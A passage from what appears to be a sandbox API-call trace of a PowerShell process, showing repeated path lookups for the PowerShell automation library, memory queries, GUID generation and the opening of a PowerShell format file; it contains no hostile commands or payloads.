lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.382] GetLastError () returned 0x0 [0145.382] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.382] GetLastError () returned 0x0 [0145.382] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.382] GetLastError () returned 0x0 [0145.382] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.382] GetLastError () returned 0x0 [0145.382] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.382] GetLastError () returned 0x0 [0145.382] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.382] GetLastError () returned 0x0 [0145.383] VirtualQuery (in: lpAddress=0x24cb64, lpBuffer=0x24db64, dwLength=0x1c | out: lpBuffer=0x24db64*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.383] VirtualQuery (in: lpAddress=0x24cba0, lpBuffer=0x24dba0, dwLength=0x1c | out: lpBuffer=0x24dba0*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.383] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d558, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.383] GetLastError () returned 0x0 [0145.383] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d508, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.383] GetLastError () returned 0x0 [0145.383] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d508, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.383] GetLastError () returned 0x0 [0145.383] VirtualQuery (in: lpAddress=0x24cb64, lpBuffer=0x24db64, dwLength=0x1c | out: lpBuffer=0x24db64*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.384] VirtualQuery (in: lpAddress=0x24cba0, lpBuffer=0x24dba0, dwLength=0x1c | out: lpBuffer=0x24dba0*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.384] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d558, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.384] GetLastError () returned 0x0 [0145.384] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d508, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.384] GetLastError () returned 0x0 [0145.384] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d508, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.384] GetLastError () returned 0x0 [0145.384] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24dac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.384] GetLastError () returned 0x0 [0145.384] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24da70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.384] GetLastError () returned 0x0 [0145.384] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24da70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.384] GetLastError () returned 0x0 [0145.384] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24da20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.384] GetLastError () returned 0x0 [0145.384] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.384] GetLastError () returned 0x0 [0145.384] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.384] GetLastError () returned 0x0 [0145.385] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24db60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.385] GetLastError () returned 0x0 [0145.385] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24db10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.385] GetLastError () returned 0x0 [0145.385] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24db10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.385] GetLastError () returned 0x0 [0145.385] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24db60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.385] GetLastError () returned 0x0 [0145.385] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24db10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.385] GetLastError () returned 0x0 [0145.385] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24db10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.385] GetLastError () returned 0x0 [0145.385] VirtualQuery (in: lpAddress=0x24cfd4, lpBuffer=0x24dfd4, dwLength=0x1c | out: lpBuffer=0x24dfd4*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.386] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.386] GetLastError () returned 0x0 [0145.386] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d978, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.386] GetLastError () returned 0x0 [0145.386] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d978, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.386] GetLastError () returned 0x0 [0145.433] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.433] GetLastError () returned 0x0 [0145.433] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.433] GetLastError () returned 0x0 [0145.433] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.433] GetLastError () returned 0x0 [0145.433] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.433] GetLastError () returned 0x0 [0145.433] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.433] GetLastError () returned 0x0 [0145.434] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.434] GetLastError () returned 0x0 [0145.434] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.434] GetLastError () returned 0x0 [0145.434] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.434] GetLastError () returned 0x0 [0145.434] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.434] GetLastError () returned 0x0 [0145.434] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.434] GetLastError () returned 0x0 [0145.434] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.434] GetLastError () returned 0x0 [0145.434] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.434] GetLastError () returned 0x0 [0145.434] VirtualQuery (in: lpAddress=0x24cfd4, lpBuffer=0x24dfd4, dwLength=0x1c | out: lpBuffer=0x24dfd4*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.435] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.435] GetLastError () returned 0x0 [0145.435] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d978, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.435] GetLastError () returned 0x0 [0145.435] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d978, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.435] GetLastError () returned 0x0 [0145.435] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.435] GetLastError () returned 0x0 [0145.435] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.435] GetLastError () returned 0x0 [0145.435] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.435] GetLastError () returned 0x0 [0145.438] CoCreateGuid (in: pguid=0x24e2b8 | out: pguid=0x24e2b8*(Data1=0x37dcd7c7, Data2=0xc048, Data3=0x4a3a, Data4=([0]=0x9e, [1]=0x2b, [2]=0xf5, [3]=0x80, [4]=0xa2, [5]=0x5c, [6]=0x5e, [7]=0xbb))) returned 0x0 [0145.440] CoCreateGuid (in: pguid=0x24e2b8 | out: pguid=0x24e2b8*(Data1=0x602fe072, Data2=0x9312, Data3=0x4aa8, Data4=([0]=0x8a, [1]=0xa9, [2]=0xb9, [3]=0x88, [4]=0xd7, [5]=0x43, [6]=0x35, [7]=0xff))) returned 0x0 [0145.440] CoCreateGuid (in: pguid=0x24e2b8 | out: pguid=0x24e2b8*(Data1=0x1db87130, Data2=0x17a7, Data3=0x4b87, Data4=([0]=0xa1, [1]=0x9b, [2]=0xd9, [3]=0x8f, [4]=0x3e, [5]=0x45, [6]=0x21, [7]=0x5a))) returned 0x0 [0145.441] CoCreateGuid (in: pguid=0x24e2b8 | out: pguid=0x24e2b8*(Data1=0x1106c46d, Data2=0x93d, Data3=0x4831, Data4=([0]=0x90, [1]=0xc0, [2]=0x77, [3]=0x41, [4]=0x1a, [5]=0x86, [6]=0x21, [7]=0x82))) returned 0x0 [0145.441] CoCreateGuid (in: pguid=0x24e2b8 | out: pguid=0x24e2b8*(Data1=0xa7a21c5e, Data2=0xfb54, Data3=0x4ce2, Data4=([0]=0x87, [1]=0xce, [2]=0x34, [3]=0x17, [4]=0x26, [5]=0x80, [6]=0x9d, [7]=0x11))) returned 0x0 [0145.441] CoCreateGuid (in: pguid=0x24e2b8 | out: pguid=0x24e2b8*(Data1=0xfd6b7dac, Data2=0x6512, Data3=0x4007, Data4=([0]=0xb8, [1]=0xc7, [2]=0x79, [3]=0x7b, [4]=0x49, [5]=0xde, [6]=0xfd, [7]=0xd3))) returned 0x0 [0145.442] CoCreateGuid (in: pguid=0x24e2b8 | out: pguid=0x24e2b8*(Data1=0x58a6723, Data2=0x1fc4, Data3=0x43ab, Data4=([0]=0xb4, [1]=0x6d, [2]=0x79, [3]=0xc1, [4]=0xa5, [5]=0xa5, [6]=0x93, [7]=0x91))) returned 0x0 [0145.442] CoCreateGuid (in: pguid=0x24e2b8 | out: pguid=0x24e2b8*(Data1=0xb5b2ba8f, Data2=0xb83, Data3=0x4d93, Data4=([0]=0xa7, [1]=0xe6, [2]=0xbb, [3]=0x68, [4]=0x50, [5]=0xd5, [6]=0xba, [7]=0xeb))) returned 0x0 [0145.442] CoCreateGuid (in: pguid=0x24e2b8 | out: pguid=0x24e2b8*(Data1=0xd1c59f89, Data2=0xc57c, Data3=0x452a, Data4=([0]=0x94, [1]=0x28, [2]=0x25, [3]=0x64, [4]=0xa9, [5]=0xc2, [6]=0x53, [7]=0xa3))) returned 0x0 [0145.445] CoCreateGuid (in: pguid=0x24e2b8 | out: pguid=0x24e2b8*(Data1=0x85a4c661, Data2=0x411, Data3=0x466f, Data4=([0]=0x93, [1]=0xf9, [2]=0x70, [3]=0xae, [4]=0xad, [5]=0x33, [6]=0x24, [7]=0x98))) returned 0x0 [0145.449] CoCreateGuid (in: pguid=0x24e2b8 | out: pguid=0x24e2b8*(Data1=0x24e7ad82, Data2=0x1c91, Data3=0x4ad5, Data4=([0]=0xab, [1]=0xb0, [2]=0xa4, [3]=0x7f, [4]=0x78, [5]=0x6b, [6]=0xc1, [7]=0xa5))) returned 0x0 [0145.451] CoCreateGuid (in: pguid=0x24e2b8 | out: pguid=0x24e2b8*(Data1=0x9f33d338, Data2=0x5b97, Data3=0x40ef, Data4=([0]=0xa3, [1]=0x2b, [2]=0x79, [3]=0x67, [4]=0x7d, [5]=0x65, [6]=0x9b, [7]=0x77))) returned 0x0 [0145.451] CoCreateGuid (in: pguid=0x24e2b8 | out: pguid=0x24e2b8*(Data1=0x4ce22a11, Data2=0x8761, Data3=0x49e2, Data4=([0]=0x95, [1]=0xae, [2]=0x4, [3]=0x86, [4]=0x9b, [5]=0xc5, [6]=0x46, [7]=0x3))) returned 0x0 [0145.451] CoCreateGuid (in: pguid=0x24e2b8 | out: pguid=0x24e2b8*(Data1=0xb554ab09, Data2=0x2a53, Data3=0x4e9a, Data4=([0]=0x94, [1]=0xb4, [2]=0xbc, [3]=0x2a, [4]=0x5b, [5]=0x3a, [6]=0xa4, [7]=0xed))) returned 0x0 [0145.452] CoCreateGuid (in: pguid=0x24e2b8 | out: pguid=0x24e2b8*(Data1=0x716fa5c8, Data2=0x5659, Data3=0x4e74, Data4=([0]=0xab, [1]=0xed, [2]=0x90, [3]=0x7e, [4]=0x31, [5]=0xf3, [6]=0x75, [7]=0x47))) returned 0x0 [0145.452] CoCreateGuid (in: pguid=0x24e2b8 | out: pguid=0x24e2b8*(Data1=0xc90f4d7a, Data2=0x7075, Data3=0x4b5c, Data4=([0]=0x82, [1]=0x47, [2]=0x67, [3]=0x83, [4]=0x89, [5]=0x90, [6]=0x45, [7]=0xa9))) returned 0x0 [0145.453] CoCreateGuid (in: pguid=0x24e2b8 | out: pguid=0x24e2b8*(Data1=0x6a096c11, Data2=0x468c, Data3=0x4f70, Data4=([0]=0x8a, [1]=0xb, [2]=0x9f, [3]=0x79, [4]=0x9, [5]=0x10, [6]=0xdb, [7]=0x50))) returned 0x0 [0145.453] CoCreateGuid (in: pguid=0x24e2b8 | out: pguid=0x24e2b8*(Data1=0xadf969b0, Data2=0xcfe3, Data3=0x492b, Data4=([0]=0x82, [1]=0x9d, [2]=0x7e, [3]=0x60, [4]=0x48, [5]=0xf, [6]=0x7, [7]=0x14))) returned 0x0 [0145.453] CoCreateGuid (in: pguid=0x24e2b8 | out: pguid=0x24e2b8*(Data1=0x35b59135, Data2=0xc0c5, Data3=0x4dba, Data4=([0]=0x99, [1]=0xae, [2]=0x6f, [3]=0xdc, [4]=0xbe, [5]=0x36, [6]=0xc2, [7]=0x16))) returned 0x0 [0145.453] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24dd5c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47 [0145.453] GetLastError () returned 0x0 [0145.453] SetErrorMode (uMode=0x1) returned 0x1 [0145.454] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, 